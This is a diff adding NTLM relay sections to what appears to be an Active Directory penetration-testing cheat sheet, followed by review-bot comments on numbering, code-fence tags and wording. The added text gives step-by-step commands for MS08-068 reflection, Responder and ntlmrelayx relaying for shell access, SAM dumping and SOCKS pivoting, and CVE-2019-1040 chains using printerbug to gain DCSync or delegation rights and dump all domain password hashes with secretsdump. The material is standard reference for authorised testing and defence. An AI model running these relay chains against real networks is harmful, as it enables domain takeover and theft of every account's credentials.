@@ -23,6 +23,9 @@
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
* [SMB Signing Disabled](#smb-signing-disabled)
* [Drop the MIC](#drop-the-mic)
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
* [Trust relationship between domains](#trust-relationship-between-domains)
* [Unconstrained delegation](#unconstrained-delegation)
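Review bot: the three new entries (MS08-068 NTLM reflection, SMB Signing Disabled, Drop the MIC) point at `####` sub-headings of the `###` "NTLMv2 hashes relaying" section, yet they sit at the same list depth as their parent and as the unrelated `###` sections around them; if the table of contents nests sub-sections elsewhere in this file, indent these three under `* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)`. The anchors themselves match the headings added further down, so the links resolve.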
@@ -658,12 +661,93 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt

### NTLMv2 hashes relaying

NTLMv1 and NTLMv2 can be relayed to connect to another machine.

| Hash | Hashcat | Attack method |
|---|---|---|
| LM | 3000 | crack/pass the hash |
| NTLM/NTHash | 1000 | crack/pass the hash |
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |

#### MS08-068 NTLM reflection

NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.

> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials.

* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068

```powershell
msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > show targets
```

#### SMB Signing Disabled

If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.

1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
```powershell
[Responder Core]
; Servers to start
...
SMB = Off # Turn this off
HTTP = Off # Turn this off
```
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
4. Wait for a shell
4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list.
```powershell
ntlmrelayx.py -tf targets.txt
```
5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
```powershell
$ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> socks
Protocol Target Username Port
-------- -------------- ------------------------ ----
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433

$ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
```

#### Drop the MIC

> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP

Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)

```powershell
python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected)
```

- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD
```powershell
TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local <attacker ip/hostname>
TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
```


- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
```powershell
# create a new machine account
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6
TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME

# connect using the ticket
export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache
secretsdump.py -k -no-pass second-dc-server.local -just-dc
```

### Dangerous Built-in Groups Usage
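Review bot: the numbered procedure under `#### SMB Signing Disabled` has two step 4s (`4. Wait for a shell` is followed by `4. Also you can use ntlmrelayx ...`), so the ntlmrelayx and SOCKS items should be renumbered 5 and 6. Every fence in the hunk is tagged `powershell` although the blocks hold an msfconsole session, an INI fragment of Responder.conf and Linux shell commands; tag them `text`, `ini` and `bash` so the highlighting matches the content. In the INI fragment, Responder.conf uses `;` for comments and Python's configparser does not strip inline comments by default, so a pasted `SMB = Off # Turn this off` yields the value `Off # Turn this off`; move the remark onto its own `;` line. Wording: `SMB protocolOnly` is missing a separator, `get a shell access` should read `get shell access`, `detect machine` should be `detect machines`, and `SOCK proxy with every compromised sessions` should be `SOCKS proxy for every compromised session`. In the Drop the MIC blocks, `ntu` in `--escalate-user ntu` is never introduced (say it is the account that receives the DCSync rights, as the bullet above the block describes), the comment `# create a new machine account` sits above a command that creates the account only as a side effect of `--delegate-access`, and the SPN `host/second-dc-server.local` does not match the `second-dc-server` host on the printerbug line; pick one hostname and state that `MACHINE$:PASSWORD` stand for the values ntlmrelayx prints when it adds the account.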
@@ -1042,4 +1126,7 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
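Review bot: the two `Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon` entries are character-for-character identical in this rendering; the hunk header (`-1042,4 +1126,7`) allows for one removed line, so if this is a modified line rather than a second copy it is fine, otherwise one of the two should go. The new entries also alternate between "Title - Date - Author" (Kerberos II) and "Title - Author - Date" (Drop the MIC, Keytab files); pick one ordering for the list.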